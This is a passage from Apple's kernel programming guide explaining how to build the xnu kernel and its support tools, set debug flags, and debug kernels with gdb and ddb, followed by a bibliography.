http://www.opensource.apple.com. To find out your current kernel version, use the command uname -a. If you run into trouble, search the archives of the darwin-kernel and darwin-development mailing lists for information. If that doesn’t help, ask for assistance on either list. The list archives and subscription information can be found at http://www.lists.apple.com. Note: Before you begin, make sure you extract the sources in a directory whose path does not contain any “special” characters (non-alphanumeric characters other than dash and underscore), as having such characters in the path leading up to the build directory can cause compiling to fail. Also, make sure that /usr/local/bin is in your PATH environment variable as follows: If you are using a csh derivative such as tcsh, you should add set path = (/usr/local/bin $path) to your .tcshrc file If you are using a Bourne shell derivative, you should add export PATH=/usr/local/bin:$PATH to your .bashrc file. Important: Once you have obtained and extracted the sources, before you begin compiling kernelsupport tools, you should configure your system to build using gcc 3.3. The OS X v10.4 kernel will not build using gcc 4.0. To do this, type: sudo gcc_select 3.3 Important: Before building anything, you should make sure you are running the latest version of OS X with the latest developer tools. The xnu compile process may reference various external headers from /System/Library/Frameworks. These headers are only installed as part of a developer toolsinstallation, not as part of the normal OS X install process. Next, you will need to compile several support tools. Get the bootstrap_cmds, Libstreams, kext_tools, IOKitUser, and cctools packagesfrom http://www.opensource.apple.com. Extract the filesfrom these .tar packages, then do the following: sudo mkdir -p /usr/local/bin sudo mkdir -p /usr/local/lib cd bootstrap_cmds-version/relpath.tproj make Building and Debugging Kernels Building Your First Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 158sudo make install cd ../../Libstreams-version make sudo make install cd ../cctools-version sudo cp /usr/include/ar.h \ /System/Library/Frameworks/Kernel.framework/Headers In the cctools package, modify the Makefile, and change the COMMON_SUBDIRS line (including the continuation line after it) to read: COMMON_SUBDIRS = libstuff libmacho misc Finally, issue the following commands: make RC_OS=macos sudo cp misc/seg_hack.NEW /usr/local/bin/seg_hack cd ld make RC_OS=macos kld_build sudo cp static_kld/libkld.a /usr/local/lib sudo ranlib /usr/local/lib/libkld.a Now you’re done with the cctools project. One final step remains: compiling kextsymboltool. To do this, extract the kext_tools tarball, then do the following: sudo mkdir -p /System/Library/Frameworks/IOKit.framework/Versions/A/PrivateHeaders/kext cd /System/Library/Frameworks/IOKit.framework/ sudo ln -s Versions/A/PrivateHeaders PrivateHeaders sudo cp PATH_TO_IOKITUSER/IOKitUser-version/kext.subproj/*.h PrivateHeaders/kext cd PATH_TO_KEXT_TOOLS/kext_tools-version gcc kextsymboltool.c -o kextsymboltool sudo cp kextsymboltool /usr/local/bin Building and Debugging Kernels Building Your First Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 159Warning: If you do not use a version of kextsymboltool that is at least as current as your kernel, you will get serious compile failures. If you see the error message “exported name not in import list”, there’s a good chance you aren’t using a current kextsymboltool. Congratulations. You now have all the necessary tools, libraries, and header files to build a kernel. The next step is to compile the kernel itself. First, change directories into the xnu directory. Next, you need to set a few environment variables appropriately. For your convenience, the kernel sources contain shell scripts to do this for you. If you are using sh, bash, zsh, or some other Bourne-compatible shell, issue the following command: source SETUP/setup.sh If you are using csh, tcsh, or a similar shell, use the following command: source SETUP/setup.csh Then, you should be able to type make exporthdrs make all and get a working kernel in BUILD/obj/RELEASE_PPC/mach_kernel (assuming you are building a RELEASE kernel for PowerPC, of course). If things don’t work, the darwin-kernel mailing list a good place to get help. Building an Alternate Kernel Configuration When building a kernel, you may want to build a configuration other than the RELEASE configuration (the default shipping configuration). Additional configurations are RELEASE_TRACE, DEBUG, DEBUG_TRACE, and PROFILE. These configurations add various additional options (except PROFILE, which is reserved for future expansion, and currently maps onto RELEASE). Building and Debugging Kernels Building an Alternate Kernel Configuration 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 160The most useful and interesting configurations are RELEASE and DEBUG. The release configuration should be the same as a stock Apple-released kernel, so this is interesting only if you are building source that differs from that which was used to build the kernel you are already running. Compiling a kernel without specifying a configuration results in the RELEASE configuration being built. The DEBUG configuration enables ddb, the in-kernel serial debugger. The ddb debugger is helpful to debug panics that occur early in boot or within certain parts of the Ethernet driver. It is also useful for debugging low-level interrupt handler routines that cannot be debugged by using the more traditional gdb. To compile an alternate kernel configuration, you should follow the same basic procedure as outlined previously, changing the final make statement slightly. For example, to build the DEBUG configuration, instead of typing make all you type make KERNEL_CONFIGS=DEBUG all and wait. To turn on additional compile options, you must modify one of the MASTER files. For information on modifying these files, see the section “Enabling Module Options” (page 156). When Things Go Wrong: Debugging the Kernel No matter how careful your programming habits, sometimes things don’t work right the first time. Kernel panics are simply a fact of life during development of kernel extensions or other in-kernel code. There are a number of ways to track down problems in kernel code. In many cases, you can find the problem through careful use of printf or IOLog statements. Some people swear by this method, and indeed, given sufficient time and effort, any bug can be found and fixed without using a debugger. Of course, the key words in that statement are “given sufficient time and effort.” For the rest of us, there are debuggers: gdb and ddb. Setting Debug Flags in Open Firmware With the exception of kernel panics or calls to PE_enter_debugger, it is not possible to do remote kernel debugging without setting debug flags in Open Firmware. These flags are relevant to both gdb and ddb debugging and are important enough to warrant their own section. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 161To set these flags, you can either use the nvram program (from the OS X command line) or access your computer’s Open Firmware. You can access Open Firmware this by holding down Command-Option-O-F at boot time. For most computers, the default is for Open Firmware to present a command–line prompt on your monitor and accept input from your keyboard. For some older computers you must use a serial line at 38400, 8N1. (Technically, such computers are not supported by OS X, but some are usable under Darwin, and thus they are mentioned here for completeness.) From an Open Firmware prompt, you can set the flags with the setenv command. From the OS X command line, you would use the nvram command. Note that when modifying these flags you should always look at the old value for the appropriate Open Firmware variables and add the debug flags. For example, if you want to set the debug flagsto 0x4, you use one of the following commands. For computers with recent versions of Open Firmware, you would type printenv boot-args setenv boot-args original_contents debug=0x4 from Open Firmware or nvram boot-args nvram boot-args="original_contents debug=0x4" from the command line (as root). For older firmware versions, the interesting variable is boot-command. Thus, you might do something like printenv boot-command setenv boot-command 0 bootr debug=0x4 from Open Firmware or nvram boot-command nvram boot-command="0 bootr debug=0x4" from the command line (as root). Of course, the more important issue is what value to choose for the debug flags. Table 20-1 (page 163) lists the debugging flags that are supported in OS X. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 162Table 20-1 Debugging flags Symbolic name Flag Meaning DB_HALT 0x01 Halt at boot-time and wait for debugger attach (gdb). DB_PRT 0x02 Send kernel debugging printf output to console. Drop into debugger on NMI (Command–Power, Command-Option-Control-Shift-Escape, or interrupt switch). DB_NMI 0x04 DB_KPRT 0x08 Send kernel debugging kprintf output to serial port. DB_KDB 0x10 Make ddb (kdb) the default debugger (requires a custom kernel). DB_SLOG 0x20 Output certain diagnostic info to the system log. Allow debugger to ARP and route (allows debugging across routers and removes the need for a permanent ARP entry, but is a potential security hole)—not available in all kernels. DB_ARP 0x40 DB_KDP_BP_DIS 0x80 Support old versions of gdb on newer systems. DB_LOG_PI_SCRN 0x100 Disable graphical panic dialog. The option DB_KDP_BP_DIS is not available on all systems, and should not be important if your target and host systems are running the same or similar versions of OS X with matching developer tools. The last option is only available in Mac OS 10.2 and later. Avoiding Watchdog Timer Problems Macintosh computers have various watchdog timers designed to protect the system from certain types of failures. There are two primary watchdog timersin common use: the power management watchdog timer (not present on all systems) and the system crash watchdog timer. Both watchdogs are part of the power management hardware. The first of these, the power management watchdog timer, is designed to restore the system to a known safe state in the event of unexpected communication loss between the power management hardware and the CPU. Thistimer is only present in G4 and earlier desktops and laptops and in early G5 desktops. More specifically, it is present only in machines containing a PMU (Power Management Unit) chip. Under normal circumstances, when communication with the PMU chip is lost, the PMU driver will attempt to get back in sync with the PMU chip. With the possible exception of a momentary loss of keyboard and mouse control, you probably won't notice that anything has happened (and you should never even experience such a stall unless you are writing a device driver that disables interrupts for an extended period of time). Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 163The problem occurs when the disruption in communication is caused by entering the debugger while the PMU chip is in one of these "unsafe" states. If the chip is left in one of these "unsafe" states for too long, it will shut the computer down to prevent overheating or other problems. This problem can be significantly reduced by operating the PMU chip in polled mode. This prevents the watchdog timer from activating. You should only use this option when debugging, however, as it diminishes performance and a crashed system could overheat. To disable this watchdog timer, add the argument pmuflags=1 to the kernel's boot arguments. See “Setting Debug Flags in Open Firmware” (page 161) for information about how to add a boot argument. The second type of watchdog timer is the system crash watchdog timer. This is normally only enabled in OS X Server. If your target machine is running OS X Server, your system will automatically reboot within seconds after a crash to maximize server uptime. You can disable this automatic reboot on crash feature in the server administration tool. Choosing a Debugger There are two basic debugging environments supported by OS X: ddb and gdb. ddb is a built-in debugger that works over a serial line. By contrast, gdb is supported using a debugging shim built into the kernel, which allows a remote computer on the same physical network to attach after a panic (or sooner if you pass certain options to the kernel). For problems involving network extensions or low-level operating system bringups, ddb is the only way to do debugging. For other bugs, gdb is generally easier to use. For completeness, this chapter describes how to use both ddb and gdb to do basic debugging. Since gdb itself is well documented and is commonly used for application programming, this chapter assumes at least a passing knowledge of the basics of using gdb and focuses on the areas where remote (kernel) gdb differs. Note: Only systems with serial hardware support ddb. Thus, it is only possible to use ddb on PowerMac G4 and older systems. Using gdb for Kernel Debugging gdb, short for the GNU Debugger, is a piece of software commonly used for debugging software on UNIX and Linux systems. This section assumes that you have used gdb before, and does not attempt to explain basic usage. In standard OS X builds (and in your builds unless you compile with ddb support), gdb support is built into the system but is turned off except in the case of a kernel panic. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 164Of course, many software failures in the kernel do not result in a kernel panic but still cause aberrant behavior. For these reasons, you can pass additional flags to the kernel to allow you to attach to a remote computer early in boot or after a nonmaskable interrupt (NMI), or you can programmatically drop into the debugger in your code. You can cause the test computer (the debug target) to drop into the debugger in the following ways: ● debug on panic ● debug on NMI ● debug on boot ● programmatically drop into the default debugger The function PE_enter_debugger can be called from anywhere in the kernel, although if gdb is your default debugger, a crash will result if the network hardware is not initialized or if gdb cannot be used in that particular context. This call is described in the header pexpert/pexpert.h. After you have decided what method to use for dropping into the debugger on the target, you must configure your debug host (the computer that will actually be running gdb). Your debug hostshould be running a version of OS X that is comparable to the version running on your target host. However, it should not be running a customized kernel, since a debug host crash would be problematic, to say the least. Note: It is possible to use a non-OS X system as your debug host. This is not a trivial exercise, however, and a description of building a cross-gdb is beyond the scope of this document. When using gdb, the best results can be obtained when the source code for the customized kernel is present on your debug host. This not only makes debugging easier by allowing you to see the lines of code when you stop execution, it also makes it easier to modify those lines of code. Thus, the ideal situation is for your debug host to also be your build computer. This is not required, but it makes things easier. If you are debugging a kernel extension, it generally suffices to have the source for the kernel extension itself on your debug host. However, if you need to see kernel-specific structures, having the kernel sources on your debug host may also be helpful. Once you have built a kernel using your debug host, you must then copy it to your target computer and reboot the target computer. At this point, if you are doing panic-only debugging, you should trigger the panic. Otherwise, you should tell your target computer to drop into the debugger by issuing an NMI (or by merely booting, in the case of debug=0x1). Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 165Next, unless your kernelsupports ARP while debugging (and unless you enabled it with the appropriate debug flag), you need to add a permanent ARP entry for the target. It will be unable to answer ARP requests while waiting for the debugger. This ensures that your connection won’t suddenly disappear. The following example assumes that your target is target.foo.com with an IP number of 10.0.0.69: $ ping -c 1 target_host_name ping results: .... $ arp -an target.foo.com (10.0.0.69): 00:a0:13:12:65:31 $ sudo arp -s target.foo.com 00:a0:13:12:65:31 $ arp -an target.foo.com (10.0.0.69) at00:a0:13:12:65:31 permanent Now, you can begin debugging by doing the following: gdb /path/to/mach_kernel source /path/to/xnu/osfmk/.gdbinit p proc0 source /path/to/xnu/osfmk/.gdbinit target remote-kdp attach 10.0.0.69 Note that the mach kernel passed as an argument to gdb should be the symbol–laden kernel file located in BUILD/obj/DEBUG_PPC/mach_kernel.sys (for debug kernel builds, RELEASE_PPC for non-debug builds), not the bootable kernel that you copied onto the debug target. Otherwise most of the gdb macros will fail. The correct kernel should be several times as large as a normal kernel. You must do the p proc0 command and source the .gdbinit file (from the appropriate kernel sources) twice to work around a bug in gdb. Of course, if you do not need any of the macros in .gdbinit, you can skip those two instructions. The macros are mostly of interest to people debugging aspects of Mach, though they also provide ways of obtaining information about currently loaded KEXTs. Warning: It may not be possible to detach in a way that the target computer’s kernel continues to run. If you detach, the target hangs until you reattach. It is not always possible to reattach, though the situation is improving in this area. Do not detach from the remote kernel! Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 166If you are debugging a kernel module, you need to do some additional work to get debugging symbol information about the module. First, you need to know the load address for the module. You can get this information by running kextstat (kmodstat on systems running OS X v10.1 or earlier) as root on the target. If you are already in the debugger, then assuming the target did not panic, you should be able to use the continue function in gdb to revive the target, get this information, then trigger another NMI to drop back into the debugger. If the target is no longer functional, and if you have a fully symbol–laden kernel file on your debug host that matches the kernel on your debug target, you can use the showallkmods macro to obtain this information. Obtaining a fully symbol–laden kernel generally requires compiling the kernel yourself. Once you have the load address of the module in question, you need to create a symbol file for the module. You do this in different ways on different versions of OS X. For versions 10.1 and earlier, you use the kmodsyms program to create a symbol file for the module. If your KEXT is called mykext and it is loaded at address 0xf7a4000, for example, you change directories to mykext.kext/Contents/MacOS and type: kmodsyms -k path/to/mach_kernel -o mykext.sym mykext@0xf7a4000 Be sure to specify the correct path for the mach kernel that is running on your target (assuming it is not the same as the kernel running on your debug host). For versions after 10.1, you have two options. If your KEXT does not crash the computer when it loads, you can ask kextload to generate the symbols at load time by passing it the following options: kextload -s symboldir mykext.kext It will then write the symbols for your kernel extension and its dependencies into files within the directory you specified. Of course, this only works if your target doesn’t crash at or shortly after load time. Alternately, if you are debugging an existing panic, or if your KEXT can’t be loaded without causing a panic, you can generate the debugging symbols on your debug host. You do this by typing: kextload -n -s symboldir mykext.kext If will then prompt you for the load address of the kernel extension and the addresses of all its dependencies. As mentioned previously, you can find the addresses with kextstat (or kmodstat) or by typing showallkmods inside gdb. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 167You should now have a file or files containing symbolic information that gdb can use to determine address–to–name mappings within the KEXT. To add the symbols from that KEXT, within gdb on your debug host, type the command add-symbol-file mykext.sym for each symbol file. You should now be able to see a human-readable representation of the addresses of functions, variables, and so on. Special gdb I/O Addressing Issues As described in “Address Spaces” (page 70), some Macintosh hardware has a third addressing mode called I/O addressing which differs from both physical and virtual addressing modes. Most developers will not need to know about these modes in any detail. Where some developers may run into problems is debugging PCI device drivers and attempting to access device memory/registers. To allow I/O-mapped memory dumping, do the following: set kdp_read_io=1 To dump in physical mode, do the following: set kdp_trans_off=1 For example: (gdb) x/x 0xf8022034 0xf8022034: Cannot access memory at address 0xf8022034 (gdb) set kdp_trans_off=1 (gdb) x/x 0xf8022034 0xf8022034: Cannot access memory at address 0xf8022034 (gdb) set kdp_read_io=1 (gdb) x/x 0xf8022034 0xf8022034: 0x00000020 (gdb) Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 168If you experience problems accessing I/O addresses that are not corrected by this procedure, please contact Apple Developer Technical Support for additional assistance. Using ddb for Kernel Debugging When doing typical debugging, gdb is probably the best solution. However, there are times when gdb cannot be used or where gdb can easily run into problems. Some of these include ● drivers for built-in Ethernet hardware ● interrupt handlers (the hardware variety, not handler threads) ● early bootstrap before the network hardware is initialized When gdb is not practical (or if you’re curious), there is a second debug mechanism that can be compiled into OS X. This mechanism is called ddb, and is similar to the kdb debugger in most BSD UNIX systems. It is not quite as easy to use as gdb, mainly because of the hardware needed to use it. Unlike gdb (which uses Ethernet for communication with a kernel stub), ddb is built into the kernel itself, and interacts directly with the user over a serial line. Also unlike gdb, using ddb requires building a custom kernel using the DEBUG configuration. For more information on building this kernel, see “Building Your First Kernel” (page 158). Note: ddb requires an actual built-in hardware serial line on the debug target. Neither PCI nor USB serial adapters will work. In order to work reliably for interrupt-level debugging, ddb controls the serial ports directly with a polled-mode driver without the use of the I/O Kit. If your debug target does not have a factory serial port, third-party adapter boards may be available that replace your internal modem with a serial port. Since these devices use the built-in serial controller, they should work for ddb. It is not necessary to install OS X drivers for these devices if you are using them only to support ddb debugging. The use of these serial port adapter cards is not an officially supported configuration, and not all computers support the third-party adapter boards needed for ddb support. Consult the appropriate adapter board vendor for compatibility information. If your target computer has two serial ports, ddb uses the modem port (SCC port 0). However, if your target has only one serial port, that port is probably attached to port 1 of the SCC cell, which means that you have to change the default port if you want to use ddb. To use this port (SCC port 1), change the line: const int console_unit=0; Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 169in osfmk/ppc/serial_console.c to read: const int console_unit=1; and recompile the kernel. Once you have a kernel with ddb support, it isrelatively easy to use. First, you need to set up a terminal emulator program on your debug host. If your debug host is running Mac OS 9, you might use ZTerm, for example. For OS X computers, or for computers running Linux or UNIX, minicom provides a good environment. Setting up these programs is beyond the scope of this document. Important: Serial port settings for communicating with ddb must be 57600 8N1. Hardware handshaking may be on, but is not necessary. Note: For targets whose Open Firmware uses the serial ports, remember that the baud rate for communicating with Open Firmware is 38400 and that hardware handshaking must be off. Once you boot a kernel with ddb support, a panic will allow you to drop into the debugger, as will a call to PE_enter_debugger. If the DB_KDB flag is not set, you will have to press the D key on the keyboard to use ddb. Alternately, if both DB_KDB and DB_NMI are set, you should be able to drop into ddb by generating a nonmaskable interrupt (NMI). See “Setting Debug Flags in Open Firmware” (page 161) for more information on debug flags. To generate a nonmaskable interrupt, hold down the command, option, control, and shift keys and hit escape (OS X v10.4 and newer), hold down the command key while pressing the power key on your keyboard (on hardware with a power key), or press the interrupt button on your target computer. At this point, the system should hang, and you should see ddb output on the serial terminal. If you do not, check your configuration and verify that you have specified the correct serial port on both computers. Commands and Syntax of ddb The ddb debugger is much more gdb-like than previous versions, but it still has a syntax that is very much its own (shared only with other ddb and kdb debuggers). Because ddb is substantially different from what most developers are used to using, this section outlines the basic commands and syntax. The commands in ddb are generally in this form: command[/switch] address[,count] Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 170The switches can be one of those shown in Table 20-2 (page 171). Table 20-2 Switch options in ddb Switch Description /A Print the location with line number if possible /I Display as instruction with possible alternate machine-dependent format /a Print the location being displayed /b Display or process by bytes Display low 8 bits as a character (nonprinting characters as octal) or count instructions while executing (depends on instruction) /c /d Display as signed decimal /h Display or process by half word (16 bits) /i Display as an instruction /l Display or process by long word (32 bits) /m Display as unsigned hex with character dump for each line /o Display in unsigned octal /p Print cumulative instruction count and call tree depth at each call or return statement /r Display in current radix, signed /s Display the null-terminated string at address (nonprinting as octal). Display in unsigned decimal or set breakpoint at a user space address (depending on command). /u /x Display in unsigned hex /z Display in signed hex The ddb debugger has a rich command set that has grown over its lifetime. Its command set is similar to that of ddb and kdb on other BSD systems, and their manual pages provide a fairly good reference for the various commands. The command set for ddb includes the following commands: Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 171break[/u] addr Set a breakpoint at the address specified by addr. Execution will stop when the breakpoint is reached. The /u switch means to set a breakpoint in user space. c or continue[/c] Continue execution after reaching a breakpoint. The /c switch meansto count instructions while executing. call Call a function. cond Set condition breakpoints. This command is not supported on PowerPC. cpu cpunum Causes ddb to switch to run on a different CPU. d or delete [addr|#] Delete a breakpoint. This takes a single argument that can be either an address or a breakpoint number. dk Equivalent to running kextstat while the target computer is running. This lists loaded KEXTs, their load addresses, and various related information. dl vaddr Dumps a range of memory starting from the address given. The parameter vaddr is a kernel virtual address. If vaddr is not specified, the last accessed address is used. See also dr, dv. dm Displays mapping information for the last address accessed. dmacro name Delete the macro called name. See macro. dp Displays the currently active page table. dr addr Dumps a range of memory starting from the address given. The parameter address is a physical address. If addr is not specified, the last accessed address is used. See also dl, dv. ds Dumps save areas of all Mach tasks. dv [addr [vsid]] Dumps a range of memory starting from the address given. The parameter addr is a virtual address in the address space indicated by vsid. If addr is not specified, the last accessed address is used. Similarly, if vsid is not specified, the last vsid is used. See also dl, dr. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 172dwatch addr Delete a watchpoint. See watch. dx Displays CPU registers. examine See print. gdb Switches to gdb mode, allowing gdb to attach to the computer. lt On PowerPC only: Dumps the PowerPC exception trace table. macro name command [ ; command .. ] Create a macro called name that executesthe listed commands. You can show a macro with the command show macro name or delete it with dmacro name. match[/p] Stop at the matching return instruction. If the /p switch is not specified, summary information is printed only at the final return. print[/AIabcdhilmorsuxz] addr1 [addr2 ...] Print the values at the addresses given in the format specified by the switch. If no switch is given, the last used switch is assumed. Synonymous with examine and x. Note that some of the listed switches may work for examine and not for print. reboot Reboots the computer. Immediately. Without doing any file-system unmounts or other cleanup. Do not do this except after a panic. s or step Single step through instructions. search[/bhl] addr value [mask[,count]] Search memory for value starting at addr. If the value is not found, this command can wreak havoc. This command may take other formatting values in addition to those listed. set $name [=] expr Sets the value of the variable or register named by name to the value indicated by expr. show Display system data. For a list of information that can be shown, type the show command by itself. Some additional options are available for certain options, particularly show all. For those suboptions, type show all by itself. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 173trace[/u] Prints a stack backtrace. If the /u flag is specified, the stack trace extends to user space if supported by architecture-dependent code. until[/p] Stop at the next call or return. w or write[/bhl] addr expr1 [expr2 ... ] Writes the value of expr1 to the memory location stored at addr in increments of a byte, half word, or long word. If additional expressions are specified, they are written to consecutive bytes, half words, or long words. watch addr[,size] Sets a watchpoint on a particular address. Execution stops when the value stored at that address is modified. Watch points are not supported on PowerPC. Warning: Watching addresses in wired kernel memory may cause unrecoverable errors on i386. x Short for examine. See print. xb Examine backward. Execute the last examine command, but use the address previous to the last one used (jumping backward by increments of the last width displayed). xf Examine forward. Execute the last examine command, but use the address following the last one used (jumping by increments of the last width displayed). The ddb debugger should seem relatively familiar to users of gdb, and its syntax was changed radically from its predecessor, kdb, to be more gdb-like. However, it is still sufficiently different that you should take some time to familiarize yourself with its use before attempting to debug something with it. It is far easier to use ddb on a system whose memory hasn’t been scribbled upon by an errant DMA request, for example. Building and Debugging Kernels When Things Go Wrong: Debugging the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 174This bibliography contains related material that may be of interest. The editions listed are the editions that were current when this list was compiled, but newer versions may be available. Apple OS X Publications The following Apple publications have information that could be of interest to you if you are programming in the kernel: Hello Debugger: Debugging a Device Driver With GDB (tutorial). Hello I/O Kit: Creating a Device Driver With Xcode (tutorial) Hello Kernel: Creating a Kernel Extension With Xcode (tutorial). Accessing Hardware From Applications I/O Kit Fundamentals Network Kernel Extensions Programming Guide Network Kernel Extensions (legacy) Mac Technology Overview Porting UNIX/Linux Applications to OS X I/O Kit Device Driver Design Guidelines Packaging Your KEXT for Distribution and Installation(tutorial). General UNIX and Open Source Resources A Quarter Century of UNIX . Peter H. Salus. Addison-Wesley, 1994.ISBN 0-201-54777-5. Berkeley Software Distribution . CSRG, UC Berkeley. USENIX and O’Reilly, 1994.ISBN 1-56592-082-1. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 175 BibliographyTheCathedralandtheBazaar:MusingsonLinuxandOpenSourcebyanAccidentalRevolutionary . Eric S.Raymond. O’Reilly & Associates, 1999.ISBN 1-56592-724-9. The New Hacker’s Dictionary . 3rd. Ed., Eric S. Raymond. MIT Press, 1996. ISBN 0-262-68092-0. Open Sources: Voices from the Open Source Revolution . Edited by Chris DiBona, Sam Ockman & Mark Stone. O’Reilly & Associates, 1999. ISBN 1-56592-582-3. Proceedings of the First Conference on Freely Redistributable Software . Free Software Foundation. FSF, 1996. ISBN 1-882114-47-7. The UNIX Desk Reference: The hu.man Pages. Peter Dyson. Sybex, 1996. ISBN 0-7821-1658-2. The UNIX Programming Environment. Brian W. Kernighan, Rob Pike. Prentice Hall, 1984. ISBN 0-13-937681-X (paperback), ISBN 0-13-937699-2 (hardback). BSD and UNIX Internals Advanced Topics in UNIX: Processes, Files, and Systems. Ronald J. Leach. Wiley, 1996. ISBN 1-57176-159-4. The Complete FreeBSD. Greg Lehey, Walnut Creek CDROM Books, 1999. ISBN 1-57176-246-9. The Design and Implementation of the 4.4BSD Operating System. Marshall Kirk McKusick, et al. Addison-Wesley, 1996. ISBN 0-201-54979-4. The Design of the UNIX Operating System. Maurice J. Bach. Prentice Hall, 1986. ISBN 0-13-201799-7. Linux Kernel Internals 2nd edition . Michael Beck, et al. Addison-Wesley, 1997. ISBN 0-201-33143-8. Lions’ Commentary on UNIX 6th Edition with Source Code . John Lions. Peer-to-Peer, 1996. ISBN 1-57398-013-7. Panic!: UNIX System Crash Dump Analysis. Chris Drake, Kimberly Brown. Prentice Hall, 1995. ISBN 0-13-149386-8. UNIX Internals: The New Frontiers. Uresh Vahalia. Prentice-Hall, 1995. ISBN 0-13-101908-2. UNIX Systems for Modern Architectures: Symmetric Multiprocessing and Caching for Kernel Programmers. Curt Schimmel. Addison-Wesley, 1994. ISBN 0-201-63338-8. Optimizing PowerPC Code . Gary Kacmarcik. Addison-Wesley Publishing Company, 1995. ISBN 0-201-40839-2. BerkeleySoftwareArchitectureManual4.4BSDEdition .WilliamJoy,Robert Fabry, Samuel Leffler,M.KirkMcKusick, Michael Karels. Computer Systems Research Group, Computer Science Division, Department of Electrical Engineering and Computer Science, University of California, Berkeley. Bibliography BSD and UNIX Internals 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 176Mach CMU Computer Science: A 25th Anniversary Commemorative . Richard F. Rashid, Ed. ACM Press, 1991. ISBN 0-201-52899-1. Load Distribution, Implementation for the Mach Microkernel . Dejan S. Milojicic. Vieweg Verlag, 1994. ISBN 3-528-05424-7. Programming under Mach . Boykin, et al. Addison-Wesley, 1993. ISBN 0-201-52739-1. Mach Workshop Proceedings. USENIX Association. October, 1990. Mach Symposium Proceedings.USENIX Association. November, 1991. Mach III Symposium Proceedings. USENIX Association. April, 1993, ISBN 1-880446-49-9. Mach 3 Documentation Series. Open Group Research Institute (RI), now Silicomp: Final Draft Specifications OSF/1 1.3 Engineering Release . RI. May 1993. OSF Mach Final Draft Kernel Principles. RI. May, 1993. OSF Mach Final Draft Kernel Interfaces. RI. May, 1993. OSF Mach Final Draft Server Writer’s Guide . RI. May, 1993. OSF Mach Final Draft Server Library Interfaces, RI, May, 1993. Research Institute Microkernel Series. Open Group Research Institute (RI): Operating Systems Collected Papers. Volume I. RI. March, 1993. Operating Systems Collected Papers. Volume II. RI. October,1993. Operating Systems Collected Papers. Volume III. RI. April, 1994. Operating Systems Collected Papers. Volume IV. RI. October, 1995. Mach: A New Kernel Foundation for UNIX Development. Proceedings of the Summer 1986 USENIX Conference. Atlanta, GA., http://www.usenix.org. UNIX as an Application Program. Proceedings of the Summer 1990 USENIX Conference. Anaheim, CA., http://www.usenix.org. OSF RI papers (Spec ‘93): OSF Mach Final Draft Kernel Interfaces Bibliography Mach 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 177OSF Mach Final Draft Kernel Principles OSF Mach Final Draft Server Library Interfaces OSF Mach Final Draft Server Writer's Guide OSF Mach Kernel Interface Changes OSF RI papers (Spec ‘94): OSF RI 1994 Mach Kernel Interfaces Draft OSF RI 1994 Mach Kernel Interfaces Draft (Part A) OSF RI 1994 Mach Kernel Interfaces Draft (Part B) OSF RI 1994 Mach Kernel Interfaces Draft (Part C) OSF RI papers (miscellaneous): Debugging an object oriented system using the Mach interface Unix File Access and Caching in a Multicomputer Environment Untyped MIG: The Protocol Untyped MIG: What Has Changed and Migration Guide Towards a World-Wide Civilization of Objects A Preemptible Mach Kernel A Trusted, Scalable, Real-Time Operating System Environment Mach Scheduling Framework Networking UNIX Network Programming . Volume 1, Networking APIs: Sockets and XTI . W. Richard Stevens. Prentice Hall, 1998, ISBN 0-13-490012-X. UNIX Network Programming . Volume 2, Interprocess Communications. W. Richard Stevens. Prentice Hall, 1998. ISBN 0-13-081081-9. TCP/IP Illustrated . Volume 1, The Protocols. W. Richard Stevens. Addison-Wesley, 1994. ISBN 0-201-63346-9. Bibliography Networking 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 178TCP/IP Illustrated . Volume 2, The Implementation .W. Richard Stevens.Addison-Wesley, 1995. ISBN0-201-63354-X. TCP/IP Illustrated . Volume 3, TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols. W. Richard Stevens. Addison-Wesley, 1996. ISBN 0-201-63495-3. Operating Systems Advanced Computer Architecture: Parallelism, Scalability, Programmability . Kai Hwang. McGraw-Hill, 1993. ISBN 0-07-031622-8. Concurrent Systems: An Integrated Approach to Operating Systems, Database, and Distributed Systems. Jean Bacon. Addison-Wesley, 1993. ISBN 0-201-41677-8. Distributed Operating Systems. Andrew S. Tanenbaum. Prentice Hall, 1995. ISBN 0-13-219908-4. Distributed Operating Systems: The Logical Design . A. Goscinski. Addison-Wesley, 1991. ISBN 0-201-41704-9. Distributed Systems, Concepts, and Designs. G. Coulouris, et al. Addison-Wesley, 1994. ISBN 0-201-62433-8. Operating System Concepts. 4th Ed., Abraham Silberschatz, Peter Galvin. Addison-Wesley, 1994. ISBN 0-201-50480-4. POSIX Information Technology-PortableOperating SystemInterface (POSIX): SystemApplication ProgramInterface (API) 